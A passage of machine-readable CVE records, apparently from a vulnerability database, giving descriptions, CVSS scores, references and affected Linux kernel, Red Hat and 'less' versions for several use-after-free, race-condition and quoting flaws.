"https://access.redhat.com/security/updates/classification/", "value": "Moderate" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "Use After Free", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-09-13T18:23:55.160Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "RHSA-2023:6901", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2023:6901" }, { "name": "RHSA-2023:7077", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2023:7077" }, { "name": "RHSA-2024:0575", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0575" }, { "name": "RHSA-2024:0724", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0724" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2023-4132" }, { "name": "RHBZ#2221707", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2221707" } ], "timeline": [ { "lang": "en", "time": "2023-07-10T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2023-02-08T00:00:00+00:00", "value": "Made public." } ], "title": "Kernel: smsusb: use-after-free caused by do_submit_urb()", "x_redhatCweChain": "CWE-416: Use After Free" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-4132", "datePublished": "2023-08-03T14:32:15.246Z", "dateReserved": "2023-08-03T08:51:00.805Z", "dateUpdated": "2024-09-13T18:23:55.160Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-4207
Vulnerability from cvelistv5
Published
2023-09-06 13:53
Modified
2024-08-02 07:17
Severity ?
EPSS score ?
Summary
Use-after-free in Linux kernel's net/sched: cls_fw component
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T07:17:12.218Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "patch", "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=76e42ae831991c828cffa8c37736ebfb831ad5ec" }, { "tags": [ "x_transferred" ], "url": "https://kernel.dance/76e42ae831991c828cffa8c37736ebfb831ad5ec" }, { "tags": [ "x_transferred" ], "url": "https://www.debian.org/security/2023/dsa-5492" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "packageName": "kernel", "product": "Kernel", "repo": "https://git.kernel.org", "vendor": "Linux", "versions": [ { "lessThan": "6.5", "status": "affected", "version": "3.18", "versionType": "custom" } ] } ], "credits": [ { "lang": "en", "type": "finder", "user": "00000000-0000-4000-9000-000000000000", "value": "valis" }, { "lang": "en", "type": "finder", "user": "00000000-0000-4000-9000-000000000000", "value": "Bing-Jhong Billy Jheng" } ], "datePublic": "2023-08-01T03:10:36+00:00", "descriptions": [ { "lang": "en", "value": "A use-after-free vulnerability in the Linux kernel\u0027s net/sched: cls_fw component can be exploited to achieve local privilege escalation.\n\nWhen fw_change() is called on an existing filter, the whole tcf_result struct is always copied into the new instance of the filter. This causes a problem when updating a filter bound to a class, as tcf_unbind_filter() is always called on the old instance in the success path, decreasing filter_cnt of the still referenced class and allowing it to be deleted, leading to a use-after-free.\n\nWe recommend upgrading past commit 76e42ae831991c828cffa8c37736ebfb831ad5ec.\n\n" } ], "impacts": [ { "capecId": "CAPEC-233", "descriptions": [ { "lang": "en", "value": "CAPEC-233 Privilege Escalation" } ] } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416 Use After Free", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-09-06T13:53:22.834Z", "orgId": "14ed7db2-1595-443d-9d34-6215bf890778", "shortName": "Google" }, "references": [ { "tags": [ "patch" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=76e42ae831991c828cffa8c37736ebfb831ad5ec" }, { "url": "https://kernel.dance/76e42ae831991c828cffa8c37736ebfb831ad5ec" }, { "url": "https://www.debian.org/security/2023/dsa-5492" }, { "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" } ], "source": { "discovery": "EXTERNAL" }, "title": "Use-after-free in Linux kernel\u0027s net/sched: cls_fw component", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778", "assignerShortName": "Google", "cveId": "CVE-2023-4207", "datePublished": "2023-09-06T13:53:22.834Z", "dateReserved": "2023-08-07T13:02:25.476Z", "dateUpdated": "2024-08-02T07:17:12.218Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-48624
Vulnerability from cvelistv5
Published
2024-02-19 00:00
Modified
2024-08-03 15:17
Severity ?
EPSS score ?
Summary
close_altfile in filename.c in less before 606 omits shell_quote calls for LESSCLOSE.
References
{ "containers": { "adp": [ { "metrics": [ { "other": { "content": { "id": "CVE-2022-48624", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-02-20T17:06:03.635874Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-07-05T17:21:42.553Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-03T15:17:55.391Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://github.com/gwsw/less/commit/c6ac6de49698be84d264a0c4c0c40bb870b10144" }, { "tags": [ "x_transferred" ], "url": "https://greenwoodsoftware.com/less/" }, { "tags": [ "x_transferred" ], "url": "https://github.com/gwsw/less/compare/v605...v606" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20240605-0010/" }, { "name": "[debian-lts-announce] 20240527 [SECURITY] [DLA 3823-1] less security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/05/msg00018.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "close_altfile in filename.c in less before 606 omits shell_quote calls for LESSCLOSE." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2024-06-10T17:11:50.319560", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://github.com/gwsw/less/commit/c6ac6de49698be84d264a0c4c0c40bb870b10144" }, { "url": "https://greenwoodsoftware.com/less/" }, { "url": "https://github.com/gwsw/less/compare/v605...v606" }, { "url": "https://security.netapp.com/advisory/ntap-20240605-0010/" }, { "name": "[debian-lts-announce] 20240527 [SECURITY] [DLA 3823-1] less security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2024/05/msg00018.html" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2022-48624", "datePublished": "2024-02-19T00:00:00", "dateReserved": "2024-02-19T00:00:00", "dateUpdated": "2024-08-03T15:17:55.391Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-45919
Vulnerability from cvelistv5
Published
2022-11-27 00:00
Modified
2024-08-03 14:24
Severity ?
EPSS score ?
Summary
An issue was discovered in the Linux kernel through 6.0.10. In drivers/media/dvb-core/dvb_ca_en50221.c, a use-after-free can occur is there is a disconnect after an open, because of the lack of a wait_event.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T14:24:03.164Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://lore.kernel.org/linux-media/20221121063308.GA33821%40ubuntu/T/#u" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230113-0008/" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=280a8ab81733da8bc442253c700a52c4c0886ffd" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "An issue was discovered in the Linux kernel through 6.0.10. In drivers/media/dvb-core/dvb_ca_en50221.c, a use-after-free can occur is there is a disconnect after an open, because of the lack of a wait_event." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2024-03-25T00:40:53.725646", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://lore.kernel.org/linux-media/20221121063308.GA33821%40ubuntu/T/#u" }, { "url": "https://security.netapp.com/advisory/ntap-20230113-0008/" }, { "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=280a8ab81733da8bc442253c700a52c4c0886ffd" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2022-45919", "datePublished": "2022-11-27T00:00:00", "dateReserved": "2022-11-27T00:00:00", "dateUpdated": "2024-08-03T14:24:03.164Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-6546
Vulnerability from cvelistv5
Published
2023-12-21 20:01
Modified
2024-09-13 23:30
Severity ?
EPSS score ?
Summary
Kernel: gsm multiplexing race condition leads to privilege escalation
References
Impacted products
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T08:35:14.746Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/04/10/18" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/04/10/21" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/04/11/7" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/04/11/9" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/04/12/1" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/04/12/2" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/04/16/2" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/04/17/1" }, { "name": "RHSA-2024:0930", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0930" }, { "name": "RHSA-2024:0937", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0937" }, { "name": "RHSA-2024:1018", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1018" }, { "name": "RHSA-2024:1019", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1019" }, { "name": "RHSA-2024:1055", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1055" }, { "name": "RHSA-2024:1250", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1250" }, { "name": "RHSA-2024:1253", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1253" }, { "name": "RHSA-2024:1306", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1306" }, { "name": "RHSA-2024:1607", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1607" }, { "name": "RHSA-2024:1612", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1612" }, { "name": "RHSA-2024:1614", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1614" }, { "name": "RHSA-2024:2093", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2093" }, { "name": "RHSA-2024:2394", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2394" }, { "name": "RHSA-2024:2621", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2621" }, { "name": "RHSA-2024:2697", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2697" }, { "name": "RHSA-2024:4577", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:4577" }, { "name": "RHSA-2024:4729", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:4729" }, { "name": "RHSA-2024:4731", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:4731" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-6546" }, { "name": "RHBZ#2255498", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2255498" }, { "tags": [ "x_transferred" ], "url": "https://github.com/torvalds/linux/commit/3c4f8333b582487a2d1e02171f1465531cde53e3" }, { "tags": [ "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-CAN-20527" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::realtime", "cpe:/a:redhat:enterprise_linux:8::nfv" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-513.24.1.rt7.326.el8_9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::crb", "cpe:/o:redhat:enterprise_linux:8::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-513.24.1.el8_9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8::baseos" ], "defaultStatus": "unaffected", "packageName": "kpatch-patch", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_aus:8.2::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.2 Advanced Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-193.136.1.el8_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_aus:8.4::baseos", "cpe:/o:redhat:rhel_e4s:8.4::baseos", "cpe:/o:redhat:rhel_tus:8.4::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-305.134.1.el8_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_tus:8.4::nfv", "cpe:/a:redhat:rhel_tus:8.4::realtime" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 8.4 Telecommunications Update Service", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-305.134.1.rt7.210.el8_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_aus:8.4::baseos", "cpe:/o:redhat:rhel_e4s:8.4::baseos", "cpe:/o:redhat:rhel_tus:8.4::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.4 Telecommunications Update Service", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-305.134.1.el8_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_aus:8.4::baseos", "cpe:/o:redhat:rhel_e4s:8.4::baseos", "cpe:/o:redhat:rhel_tus:8.4::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-305.134.1.el8_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_e4s:8.4::baseos" ], "defaultStatus": "unaffected", "packageName": "kpatch-patch", "product": "Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:8.6::baseos", "cpe:/o:redhat:rhev_hypervisor:4.4::el8", "cpe:/a:redhat:rhel_eus:8.6::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.6 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-372.93.1.el8_6", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:8.6::baseos" ], "defaultStatus": "unaffected", "packageName": "kpatch-patch", "product": "Red Hat Enterprise Linux 8.6 Extended Update Support", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:8.8::crb", "cpe:/o:redhat:rhel_eus:8.8::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.8 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-477.55.1.el8_8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:8.8::baseos" ], "defaultStatus": "unaffected", "packageName": "kpatch-patch", "product": "Red Hat Enterprise Linux 8.8 Extended Update Support", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::appstream", "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/a:redhat:enterprise_linux:9::nfv" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-427.13.1.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::appstream", "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/a:redhat:enterprise_linux:9::nfv" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-427.13.1.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.0::crb", "cpe:/o:redhat:rhel_eus:9.0::baseos", "cpe:/a:redhat:rhel_eus:9.0::appstream" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9.0 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-70.93.2.el9_0", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.0::realtime", "cpe:/a:redhat:rhel_eus:9.0::nfv" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9.0 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-70.93.1.rt21.165.el9_0", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:9.0::baseos" ], "defaultStatus": "unaffected", "packageName": "kpatch-patch", "product": "Red Hat Enterprise Linux 9.0 Extended Update Support", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.2::appstream", "cpe:/o:redhat:rhel_eus:9.2::baseos", "cpe:/a:redhat:rhel_eus:9.2::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9.2 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-284.55.1.el9_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.2::realtime", "cpe:/a:redhat:rhel_eus:9.2::nfv" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9.2 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-284.55.1.rt14.340.el9_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:9.2::baseos" ], "defaultStatus": "unaffected", "packageName": "kpatch-patch", "product": "Red Hat Enterprise Linux 9.2 Extended Update Support", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:8.6::baseos", "cpe:/o:redhat:rhev_hypervisor:4.4::el8", "cpe:/a:redhat:rhel_eus:8.6::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Virtualization 4 for Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-372.93.1.el8_6", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/cluster-logging-operator-bundle", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.7.13-16", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/cluster-logging-rhel8-operator", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.7.13-7", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/elasticsearch6-rhel8", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v6.8.1-408", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/elasticsearch-operator-bundle", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.7.13-19", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/elasticsearch-proxy-rhel8", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v1.0.0-480", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/elasticsearch-rhel8-operator", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.7.13-9", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/eventrouter-rhel8", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v0.4.0-248", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/fluentd-rhel8", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v1.14.6-215", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/kibana6-rhel8", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v6.8.1-431", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/log-file-metric-exporter-rhel8", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v1.1.0-228", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/logging-curator5-rhel8", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.1-471", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/logging-loki-rhel8", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v2.9.6-15", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/logging-view-plugin-rhel8", "product": "RHOL-5.7-RHEL-8", "vendor": "Red 